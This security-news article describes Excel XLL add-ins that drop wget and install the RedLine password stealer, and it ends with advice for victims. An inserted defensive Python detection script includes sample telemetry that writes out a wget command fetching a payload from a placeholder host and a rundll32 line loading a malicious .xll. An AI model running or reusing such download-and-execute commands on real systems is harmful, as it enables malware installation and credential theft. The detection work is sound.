Infected Excel XLL Add-ins Distribute the RedLine Password-Stealing Malware

Discussion forums and contact forms are being spammed by cybercriminals to spread Excel XLL files that download and install the RedLine malware, which steals passwords and personal information.

RedLine is a data-stealing Trojan that takes cookies, user names and passwords, and credit card information from compromised web browsers, as well as FTP credentials and files. It can also execute commands, download and launch additional malware, and take screenshots of the active Windows screen. All of this information is collected and sent back to the attackers, who sell it on criminal markets or exploit it for other destructive and fraudulent purposes.

Various phishing lures, such as false advertising requests, Christmas gift suggestions, and website promotions, are spammed into contact forms. For some of these lures, the threat actors have built bogus websites that host the malicious Excel XLL files which install the malware.

An XLL file is an Excel add-in (a DLL) that lets developers extend Excel’s capabilities: reading and writing data, importing data from other sources, and implementing custom functions for different tasks. When the add-in is opened, Microsoft Excel loads the XLL file and calls the ‘xlAutoOpen’ function it exports.

In tests by security researcher TheAnalyst, the XLL file did not load successfully. Manually executing the DLL with regsvr32.exe or with the ‘rundll32 name.xll, xlAutoOpen’ command extracts the wget.exe program to the %UserProfile% folder; wget.exe is then used to download the RedLine binary from a remote location. The malware is stored as %UserProfile%\JavaBridge32.exe [VirusTotal] and then executed.

Because of a Registry autorun entry, the RedLine information-stealer is also launched automatically every time the victim logs in to Windows. Once running, the malware looks for valuable data to steal, such as credentials and credit cards stored in the Chrome, Firefox, Edge, Opera, and Brave browsers.
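The chain described above (XLL executed through regsvr32/rundll32, wget.exe dropped in %UserProfile%, JavaBridge32.exe written and run, a Registry autorun entry) is something a defender can look for in endpoint telemetry. The following is an added detection example, not code from the article or from the researcher cited; the sample events are constructed in a simplified Sysmon-like key=value format, the HKCU ...\CurrentVersion\Run key is assumed (the article says only "Registry autorun entry"), and only the JavaBridge32.exe file name and the rundll32/regsvr32 loading pattern are taken from the page.

```python
import re

# Constructed sample telemetry (simplified Sysmon-style key=value lines); not real campaign logs.
SAMPLE_EVENTS = [
    r'ProcessCreate image=C:\Windows\System32\rundll32.exe cmdline="rundll32 C:\Users\alice\Downloads\invoice.xll,xlAutoOpen" parent=C:\Windows\explorer.exe',
    r'ProcessCreate image=C:\Users\alice\wget.exe cmdline="wget.exe http://payload.invalid/x -O C:\Users\alice\JavaBridge32.exe" parent=C:\Windows\System32\rundll32.exe',
    r'ProcessCreate image=C:\Users\alice\JavaBridge32.exe cmdline="C:\Users\alice\JavaBridge32.exe" parent=C:\Users\alice\wget.exe',
    r'RegistrySet key=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\JavaBridge value=C:\Users\alice\JavaBridge32.exe',
    r'ProcessCreate image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" cmdline="EXCEL.EXE C:\Users\bob\report.xlsx" parent=C:\Windows\explorer.exe',
]

# key=value pairs; values may be double-quoted when they contain spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# An executable sitting directly in the root of a user profile (C:\Users\<name>\<file>.exe),
# which is where the article says wget.exe and JavaBridge32.exe are written.
USERPROFILE_ROOT_EXE = re.compile(r'^[A-Za-z]:\\Users\\[^\\]+\\[^\\]+\.exe$', re.IGNORECASE)
# Assumed autorun location (Run / RunOnce); the article does not name the exact key.
AUTORUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.IGNORECASE)
# Binaries the article says were used to execute the XLL outside of Excel
LOADER_IMAGES = ("rundll32.exe", "regsvr32.exe")

# Map each rule to the stage of the chain it evidences
STAGES = {
    "xll_loaded_outside_excel": "load",
    "wget_in_userprofile_root": "download",
    "redline_filename_ioc": "execute",
    "exe_in_userprofile_root": "execute",
    "autorun_points_to_userprofile_exe": "persist",
}


def parse_event(line):
    """Split one telemetry line into its event kind and a dict of fields."""
    kind, _, rest = line.partition(" ")
    fields = {}
    for m in FIELD_RE.finditer(rest):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    fields["kind"] = kind
    return fields


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev):
    """Return the names of the rules that fire for one parsed event."""
    hits = []
    if ev["kind"] == "ProcessCreate":
        image = ev.get("image", "")
        name = basename(image)
        cmd = ev.get("cmdline", "").lower()
        # rundll32 / regsvr32 being handed an .xll (the manual execution path from the article)
        if name in LOADER_IMAGES and ".xll" in cmd:
            hits.append("xll_loaded_outside_excel")
        # wget.exe running from the profile root: the downloader stage
        if name == "wget.exe" and USERPROFILE_ROOT_EXE.match(image):
            hits.append("wget_in_userprofile_root")
        # File name reported for the RedLine binary
        if name == "javabridge32.exe":
            hits.append("redline_filename_ioc")
        # Generic heuristic: any other executable launched from the profile root is unusual
        elif USERPROFILE_ROOT_EXE.match(image) and name != "wget.exe":
            hits.append("exe_in_userprofile_root")
    elif ev["kind"] == "RegistrySet":
        # Autorun value that points at an executable in the profile root
        if AUTORUN_KEY.search(ev.get("key", "")) and USERPROFILE_ROOT_EXE.match(ev.get("value", "")):
            hits.append("autorun_points_to_userprofile_exe")
    return hits


def detect(lines):
    """Return (line, rules) for every line that triggers at least one rule."""
    results = []
    for line in lines:
        hits = evaluate(parse_event(line))
        if hits:
            results.append((line, hits))
    return results


def chain_stages(lines):
    """Return the set of chain stages (load/download/execute/persist) seen in the lines."""
    return {STAGES[rule] for _, hits in detect(lines) for rule in hits}


if __name__ == "__main__":
    for line, hits in detect(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", line)
    print("stages observed:", sorted(chain_stages(SAMPLE_EVENTS)))
```

Each rule on its own is only a weak signal (rundll32 loading a DLL, or an executable in a user's profile root, both happen legitimately); the value is in seeing several stages of the chain on one host within a short window, which is what `chain_stages` summarises.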

If you have been a victim of this campaign, assume that your passwords have been compromised and change them right away. Furthermore, if you have credit cards saved in your browsers, you should notify your credit card company of the incident.

Because XLL files are executables, threat actors can use them to perform a wide range of harmful actions on a device. As a result, you should only open one if it comes from a reliable source.

These files are not usually distributed as email attachments; instead, they are installed by third-party software or by a Windows administrator. So if you receive an email or other message containing such a file, delete it and report it as spam.

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.